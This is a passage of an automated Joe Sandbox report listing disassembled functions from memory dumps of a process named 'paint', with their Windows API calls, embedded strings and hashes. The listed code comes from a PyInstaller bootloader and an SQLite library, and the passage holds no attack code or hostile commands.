Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction ID: 0d1b3dee8a3fa41962de25fb3e264486efd0224d3d2be7e44cc11a1d7d7c7d44
Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction Fuzzy Hash: 1E218531A0C64292EB109B95F45463AE3A5FF86BA1F900235E67EC7BE4EF7ED4448740

Function 00007FF6F0BEB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6F0BEB1CF
FlsGetValue.KERNEL32 ref: 00007FF6F0BEB1E4
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB205
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB232
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB243
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB254
SetLastError.KERNEL32 ref: 00007FF6F0BEB26F

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: bbf68cfa50da0a2ef77e92b39c4dc447a4e2413ee47612c2d0c3431193a22681
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: 96216820F0C203A2FB686761565153EA6525F467A0F808774EA3FC6BDBFE3EB4008301

Function 00007FF6F0BF7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6F0BF7E0D
GetLastError.KERNEL32 ref: 00007FF6F0BF7E19
CloseHandle.KERNEL32 ref: 00007FF6F0BF7E31
CreateFileW.KERNEL32 ref: 00007FF6F0BF7E5C
WriteConsoleW.KERNEL32 ref: 00007FF6F0BF7E7B

Strings

CONOUT$, xrefs: 00007FF6F0BF7E3D

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: e38d1d0bbaa1cf34920b9637b55754055e6fecf8fefd53a746e6bffa39d3b7e5
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: E311D035B18A4182F3608B92E85472976A8FB89BE5F440234EA6EC77E4EF3DD904C740

Function 00007FFDFB0FEE60 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0FEF06

Strings

hidden, xrefs: 00007FFDFB0FF2FD
vtable constructor called recursively: %s, xrefs: 00007FFDFB0FF032
vtable constructor failed: %s, xrefs: 00007FFDFB0FF079
vtable constructor did not declare schema: %s, xrefs: 00007FFDFB0FF1B8

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 4225454184-1299490920
Opcode ID: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
Instruction ID: 39ac2396500219983592f880ebd50cebee78184f10808275cebc573bc2075c9a
Opcode Fuzzy Hash: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
Instruction Fuzzy Hash: C8029B62B0ABC282EB508F11E460BB97BA1FB86B94F044231DE6D077E9DF3CE4459740

Function 00007FF6F0BD8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD85E9

Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD870A

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction ID: 0ef6f20dda38a34aa6ed094f57ae08ab0b7df4001c51ce10687f89d8e248adfb
Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction Fuzzy Hash: F441E562B1A68251E7309F11A5046AAA395FF86BD5F840131DF6ED7BC9FE3DE401C700

Function 00007FFDFB08C090 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 366COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB08C1DD
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB08C337

Strings

database corruption, xrefs: 00007FFDFB08C190, 00007FFDFB08C2D7
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB08C183, 00007FFDFB08C2CA
%s at line %d of [%.10s], xrefs: 00007FFDFB08C19C, 00007FFDFB08C2E3

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
Instruction ID: ba7af55bf64a647dcf96db9d81cfa156bd7d1044ee10fd63b0d0e506ccfdbf06
Opcode Fuzzy Hash: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
Instruction Fuzzy Hash: DAF1AE73709B8296DBA08F55E050BAD77A0FB46B94F108036EE9E43BA9DF38D944D700

Function 00007FFDFB0C6710 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 338COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C68A2
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0C6B2E

Strings

unknown column "%s" in foreign key definition, xrefs: 00007FFDFB0C6ABE
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFB0C67BE
foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFB0C6795

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4225454184-272990098
Opcode ID: d5db58813692b2099925d77a8811b7dd99f171d082e8c1498eafdd5cd9730581
Instruction ID: bb137264011680f95cf635adb805385a8ab4a2e374fdd156011fe04eb74458e5
Opcode Fuzzy Hash: d5db58813692b2099925d77a8811b7dd99f171d082e8c1498eafdd5cd9730581
Instruction Fuzzy Hash: EBD1E3A2B0A78386EB32CB559864AB97B91EB46BC4F544531EE6D037E9DF3CE441D300

Function 00007FFDFB085660 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB085A15
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB085A2A

Strings

database corruption, xrefs: 00007FFDFB0856B1
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0856A5
%s at line %d of [%.10s], xrefs: 00007FFDFB0856BD

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
Instruction ID: 78974113012f1cdc12150d7e2a74623cd279566bab1194e0e8627d6f5cf4ccf3
Opcode Fuzzy Hash: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
Instruction Fuzzy Hash: 26D1D073B0AA8686DB60CF15E090BA9B7A5FB85B84F558032DE5D477A8EF3CD900D740

Function 00007FF6F0BD90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BD8760: GetCurrentProcess.KERNEL32 ref: 00007FF6F0BD8780
Part of subcall function 00007FF6F0BD8760: OpenProcessToken.ADVAPI32 ref: 00007FF6F0BD8793
Part of subcall function 00007FF6F0BD8760: GetTokenInformation.ADVAPI32 ref: 00007FF6F0BD87B8
Part of subcall function 00007FF6F0BD8760: GetLastError.KERNEL32 ref: 00007FF6F0BD87C2
Part of subcall function 00007FF6F0BD8760: GetTokenInformation.ADVAPI32 ref: 00007FF6F0BD8802
Part of subcall function 00007FF6F0BD8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6F0BD881E
Part of subcall function 00007FF6F0BD8760: CloseHandle.KERNEL32 ref: 00007FF6F0BD8836

LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD916C
LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD9175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6F0BD9142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6F0BD9183
S-1-3-4, xrefs: 00007FF6F0BD9121
D:(A;;FA;;;%s), xrefs: 00007FF6F0BD9157

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: df58461f1ba567b84b3b04b22f6fdbac130d38a3452fa16294b81da0e13de93f
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 7A214F25A09783A1E7509B50E5152EAA366EF86780FC44031EA6ED37D6EF3ED9058780

Function 00007FF6F0BEB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB347
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB37D
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3CC
SetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3E7

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: 498e2a346c6e4d6ad3005ace1b4cd4972917cc49782e3d3440c486b9754c78e5
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: F8114720B0C642A2FB54A721569253E62569F4A7B0F948774E83FC67DBFE3EB4018305

Function 00007FFDFB0B8CA0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0B8EBD
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0B8F8C
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0B908C

Strings

"%w" , xrefs: 00007FFDFB0B8D4B
%Q%s, xrefs: 00007FFDFB0B8FF2

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: "%w" $%Q%s
API String ID: 4225454184-1987291987
Opcode ID: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
Instruction ID: 9f56fa31eb0708f923a3df1a0fa7aea87ffac0bc777b2ed9d4f57e541ae69cd9
Opcode Fuzzy Hash: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
Instruction Fuzzy Hash: F3C1B162B0AB8385EB148F15A460A7967A1FB56BA4F148235DE7E477F8CF3CE444DB00

Function 00007FFDFB0810D0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0813A7
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB081415

Strings

database corruption, xrefs: 00007FFDFB08115E
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB081152
%s at line %d of [%.10s], xrefs: 00007FFDFB08116A

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
Instruction ID: 88c12a729b85bf37906f1b42e5b8fd1a0e93bb873f21bdd64976359abd9c310e
Opcode Fuzzy Hash: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
Instruction Fuzzy Hash: 1BA13833B0E6D286D7248B1994A0ABE7B92FB85744F048135DBAE837E9DE3CD154D710

Function 00007FFDFB0B7D30 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0B7F3E
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0B7FA9

Strings

virtual tables may not be altered, xrefs: 00007FFDFB0B7DC8
sqlite_altertab_%s, xrefs: 00007FFDFB0B7EFD
Cannot add a column to a view, xrefs: 00007FFDFB0B7DE4

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 4225454184-2063813899
Opcode ID: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
Instruction ID: 42dd3019495cdd6402977b8804f2fa9f586400db58c33f9bb616eda70b8e7695
Opcode Fuzzy Hash: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
Instruction Fuzzy Hash: 8D91E362B0AB8286EB50CF119460AB977A5FB4ABC4F458235DE6D477E9EF3CE440D700

Function 00007FFDFB088720 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0888DC
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0889E1

Strings

database corruption, xrefs: 00007FFDFB0887CF
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0887BC
%s at line %d of [%.10s], xrefs: 00007FFDFB0887D6

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
Instruction ID: edfc9a98acf154de677c4cadc7c85b3e4d30f03f29710ce013ea656a850b3ecf
Opcode Fuzzy Hash: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
Instruction Fuzzy Hash: C491E362B09AC286D710CB2691A0EBE77A0FB41784F088136DBAD476E9DF3CE555D740

Function 00007FFDFB08B100 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFB089940: 00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0899AD
Part of subcall function 00007FFDFB089940: 00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0899D4

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB08B383
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB08B399

Strings

database corruption, xrefs: 00007FFDFB08B1C0
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB08B1A7
